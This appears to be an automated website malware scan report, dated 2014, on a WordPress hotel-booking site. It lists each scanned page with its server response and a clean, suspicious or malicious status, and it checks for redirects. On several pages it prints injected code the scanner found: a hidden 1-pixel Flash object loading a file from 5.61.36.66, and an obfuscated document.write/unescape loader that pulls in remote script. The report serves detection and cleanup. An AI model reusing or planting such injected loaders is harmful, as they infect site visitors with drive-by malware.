Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cambodiarooms.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://cambodiarooms.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 13:33:25 GMT Location: http://www.cambodiarooms.com/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.cambodiarooms.com/xmlrpc.php X-Powered-By: PHP/5.3.28 | clean |
http://www.cambodiarooms.com/ | 200 OK Content-Length: 11137 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 5.61.36.66 ...[3888 bytes skipped]... script'> /* <![CDATA[ */ var _wpcf7 = {"loaderUrl":"http:\/\/www.cambodiarooms.com\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","sending":"Sending ..."}; /* ]]> */ </script> <script type='text/javascript' src='http://www.cambodiarooms.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.8'></script> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1px" height="1px" id="ru574gfs"> <param name="AllowScriptAccess" value="always"/> <param name="myid" value="ru574gfs" /> <param name="movie" value="http://5.61.36.66/jobhO.swf?myid=ru574gfs"/> <embed src="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1" height="1"> </embed> </object> </body> </html> | ||
http://www.cambodiarooms.com/wp-content/themes/combodia/js/AC_RunActiveContent.js | 200 OK Content-Length: 8321 Content-Type: application/javascript | clean |
http://www.cambodiarooms.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/javascript | clean |
http://www.cambodiarooms.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.cambodiarooms.com/wp-content/plugins/cf7-calendar/inc/js/jscal2.js | 200 OK Content-Length: 32523 Content-Type: application/javascript | clean |
http://www.cambodiarooms.com/wp-content/plugins/cf7-calendar/inc/js/unicode-letter.js | 200 OK Content-Length: 4535 Content-Type: application/javascript | clean |
http://www.cambodiarooms.com/wp-content/plugins/cf7-calendar/inc/js/lang/.js | 404 Not Found Content-Length: 8342 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 5.61.36.66 ...[3852 bytes skipped]... script'> /* <![CDATA[ */ var _wpcf7 = {"loaderUrl":"http:\/\/www.cambodiarooms.com\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","sending":"Sending ..."}; /* ]]> */ </script> <script type='text/javascript' src='http://www.cambodiarooms.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.8'></script> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1px" height="1px" id="ru574gfs"> <param name="AllowScriptAccess" value="always"/> <param name="myid" value="ru574gfs" /> <param name="movie" value="http://5.61.36.66/jobhO.swf?myid=ru574gfs"/> <embed src="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1" height="1"> </embed> </object> </body> </html> | ||
http://www.cambodiarooms.com//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Mon, 22 Dec 2014 13:33:32 GMT Pragma: no-cache Location: http://www.cambodiarooms.com/translate.google.com/translate_a/element.js?cb=googleTranslateElementInit/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.cambodiarooms.com/xmlrpc.php X-Powered-By: PHP/5.3.28 | clean |
http://www.cambodiarooms.com/translate.google.com/translate_a/element.js?cb=googletranslateelementinit/ | 404 Not Found Content-Length: 8342 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 5.61.36.66 ...[3852 bytes skipped]... script'> /* <![CDATA[ */ var _wpcf7 = {"loaderUrl":"http:\/\/www.cambodiarooms.com\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","sending":"Sending ..."}; /* ]]> */ </script> <script type='text/javascript' src='http://www.cambodiarooms.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.8'></script> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1px" height="1px" id="ru574gfs"> <param name="AllowScriptAccess" value="always"/> <param name="myid" value="ru574gfs" /> <param name="movie" value="http://5.61.36.66/jobhO.swf?myid=ru574gfs"/> <embed src="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1" height="1"> </embed> </object> </body> </html> | ||
http://www.cambodiarooms.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.50.0-2014.02.05 | 200 OK Content-Length: 16305 Content-Type: application/javascript | clean |
http://www.cambodiarooms.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.8 | 200 OK Content-Length: 9630 Content-Type: application/javascript | clean |
http://www.cambodiarooms.com/about-us/ | 200 OK Content-Length: 10362 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 5.61.36.66 ...[3839 bytes skipped]... script'> /* <![CDATA[ */ var _wpcf7 = {"loaderUrl":"http:\/\/www.cambodiarooms.com\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","sending":"Sending ..."}; /* ]]> */ </script> <script type='text/javascript' src='http://www.cambodiarooms.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.8'></script> <object type="application/x-shockwave-flash" data="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1px" height="1px" id="ru574gfs"> <param name="AllowScriptAccess" value="always"/> <param name="myid" value="ru574gfs" /> <param name="movie" value="http://5.61.36.66/jobhO.swf?myid=ru574gfs"/> <embed src="http://5.61.36.66/jobhO.swf?myid=ru574gfs" width="1" height="1"> </embed> </object> </body> </html> | ||
http://www.cambodiarooms.com/wp-includes/js/comment-reply.min.js?ver=3.9.1 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://www.cambodiarooms.com/search-by-country/ | 200 OK Content-Length: 14931 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%2631tsd%2631%264E%2631iuuq%264B00kbwbufsn/dpn0pof/kt%2631%264F%264D0tdsjqu%264F1') Antivirus reports:
| ||
http://brands.datahc.com/Affiliate/SearchBox/547 | 200 OK Content-Length: 32697 Content-Type: text/html | clean |
http://brands.datahc.com/test404page.js | HTTP/1.1 302 Moved Temporarily Cache-Control: private, max-age=86366 Connection: close Date: Mon, 22 Dec 2014 13:33:37 GMT Location: /PageNotFound.aspx?aspxerrorpath=/test404page.js Content-Length: 165 Expires: Tue, 23 Dec 2014 13:33:03 GMT P3P: CP="NOI DEVa TAIa OUR BUS UNI" | clean |
http://brands.datahc.com/pagenotfound.aspx?aspxerrorpath=/test404page.js | 404 Not Found Content-Length: 51800 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cambodiarooms.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 22 Dec 2014 13:33:25 GMT
Location: http://www.cambodiarooms.com/
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.cambodiarooms.com/xmlrpc.php
X-Powered-By: PHP/5.3.28
...0 bytes of data.
GET / HTTP/1.1
Host: cambodiarooms.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 22 Dec 2014 13:33:25 GMT
Location: http://www.cambodiarooms.com/
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.cambodiarooms.com/xmlrpc.php
X-Powered-By: PHP/5.3.28
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cambodiarooms.com
Referer: http://www.google.com/search?q=cambodiarooms.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cambodiarooms.com
Referer: http://www.google.com/search?q=cambodiarooms.com
Result:
The result is similar to the first query. There are no suspicious redirects found.